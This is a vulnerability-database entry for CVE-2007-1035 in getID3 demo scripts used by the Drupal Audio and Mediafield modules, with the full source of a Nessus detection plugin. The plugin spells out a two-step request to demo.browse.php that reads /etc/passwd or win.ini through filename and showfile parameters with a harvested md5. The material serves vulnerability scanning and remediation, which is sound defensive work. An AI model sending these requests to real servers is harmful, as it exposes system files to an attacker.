Vulnerabilities > CVE-2007-1035 - Remote Command Execution vulnerability in Drupal Audio And MediaField Modules GetID3

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
drupal
nessus

Summary

Unspecified vulnerability in certain demonstration scripts in getID3 1.7.1, as used in the Mediafield and Audio modules for Drupal, allows remote attackers to read and delete arbitrary files, list arbitrary directories, and write to empty files or .mp3 files via unknown vectors. This vulnerability affects the following versions of Drupal Mediafield Module: Drupal, Mediafield Module, 4.7.x-1.x-dev Drupal, Mediafield Module, 5.x-1.x-dev This vulnerability affects the following versions of Drupal Audio Module: Drupal, Audio Module, 4.7.x-1.x-dev Drupal, Audio Module, 5.x-0.2 Drupal, Audio Module, 5.x-0.x-dev

Vulnerable Configurations

Part Description Count
Application
Drupal
3

Nessus

NASL familyCGI abuses
NASL idGETID3_178.NASL
descriptiongetID3, a web-based tool for extracting information from MP3 files, is installed on the remote web server. The installation of getID3 includes a set of demo scripts that allow an unauthenticated, remote attacker to read and delete arbitrary files, write files with some restrictions, and execute arbitrary code, all subject to the privileges under which the web server runs. Note that getID3 may be installed in support of another application, such as the Drupal Audio or Mediafield modules.
last seen2020-06-01
modified2020-06-02
plugin id24746
published2007-03-01
reporterThis script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/24746
titlegetID3 < 1.7.8-b1 Multiple Remote Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(24746);
  script_version("1.21");
  script_cvs_date("Date: 2018/11/28 22:47:41");

  script_cve_id("CVE-2007-1035");
  script_bugtraq_id(22587);

  script_name(english:"getID3 < 1.7.8-b1 Multiple Remote Vulnerabilities");
  script_summary(english:"Attempts to read a file with getID3's demo.browse.php.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"getID3, a web-based tool for extracting information from MP3 files, is
installed on the remote web server.

The installation of getID3 includes a set of demo scripts that allow
an unauthenticated, remote attacker to read and delete arbitrary
files, write files with some restrictions, and execute arbitrary code,
all subject to the privileges under which the web server runs.

Note that getID3 may be installed in support of another application,
such as the Drupal Audio or Mediafield modules." );
  script_set_attribute(attribute:"see_also", value:"https://www.drupal.org/node/119385" );
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e0625253" );
  script_set_attribute(attribute:"solution", value:
"Either remove the getID3 'demos' directory or upgrade to getID3
version 1.7.8b1 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_publication_date", value: "2007/03/01");
  script_set_attribute(attribute:"vuln_publication_date", value: "2007/02/17");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:drupal");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:audio_module");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:getid3");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:mediafield_module");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl","os_fingerprint.nasl", "drupal_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

port = get_http_port(default:80, embedded:FALSE, php:TRUE);

# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/getid3", cgi_dirs()));
else dirs = make_list(cgi_dirs());

app = "Drupal";
get_install_count(app_name:app, exit_if_zero:FALSE);

installs = get_installs(app_name:app, port:port);
if (!isnull(installs[1]))
{
  foreach install (installs[1])
  {
    dir = install['path'];
    dirs = make_list(dir + "/modules/audio/getid3", dirs);
  }
}

# Determine what to look for.
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os) files = make_list('windows/win.ini', 'winnt/win.ini');
  else files = make_list('etc/passwd');
}
else files = make_list('etc/passwd', 'windows/win.ini', 'winnt/win.ini');

file_pats = make_array();
file_pats['etc/passwd'] = "root:.*:0:[01]:";
file_pats['winnt/win.ini'] = "^\[[a-zA-Z]+\]|^; for 16-bit app support";
file_pats['windows/win.ini'] = "^\[[a-zA-Z]+\]|^; for 16-bit app support";

vuln = FALSE;
non_vuln= make_list();

foreach dir (dirs)
{
  install = build_url(qs:dir, port:port);
  foreach file (files)
  {
    # Try to exploit the flaw to read a file.
    url = "/demos/demo.browse.php";

    # First we need to get the MD5 checksum.
    w = http_send_recv3(method:"GET",
      item: dir + url + "?" +"filename=/" +file,
      port:port,
      exit_on_fail:TRUE
    );
    res = w[2];
    attack_req1 = install + url + "?" +"filename=/" +file;

    md5 = NULL;
    if ("<b>md5_file</b>" >< res)
    {
      pat = '<b>md5_file</b></td><td valign="top">string&nbsp;\\(32\\)</td><td>([^<]+)</td>';
      matches = egrep(pattern:pat, string:res);
      if (matches)
      {
        foreach match (split(matches))
        {
          match = chomp(match);
          m = eregmatch(pattern:pat, string:match);
          if (!isnull(m))
          {
            md5 = m[1];
            break;
          }
        }
      }
    }

    # Try to retrieve the file now that we have the MD5 file.
    if (md5)
    {
      w = http_send_recv3(method:"GET",
        item: dir + url + "?" + "showfile=/" + file + "&" + "md5=" + md5,
        port:port,
        exit_on_fail:TRUE
      );
      res = w[2];

      # There's a problem if there's an entry for root.
      if (egrep(pattern:file_pats[file], string:res))
      {
        attack_req2 = dir + url + "?" + "showfile=/" + file + "&" + "md5="+md5;
        vuln = TRUE;
        break;
      }
      else non_vuln = list_uniq(make_list(non_vuln, install));
    }
    if (vuln)break;
  }
  if (vuln) break;
}

if (vuln)
{
  security_report_v4(
    port        : port,
    severity    : SECURITY_HOLE,
    file        : file,
    request     : make_list(attack_req1, attack_req2),
    output      : chomp(res),
    attach_type : 'text/plain'
  );
  exit(0);
}
else
{
  installs = max_index(non_vuln);
  if (installs == 0) audit(AUDIT_WEB_APP_NOT_INST, 'getID3', port);
  else if (installs == 1) audit(AUDIT_WEB_APP_NOT_AFFECTED, 'getID3', non_vuln[0]);
  else exit(0, "None of the getID3 installs (" + join(non_vuln, sep:" & ") + ") are affected.");
}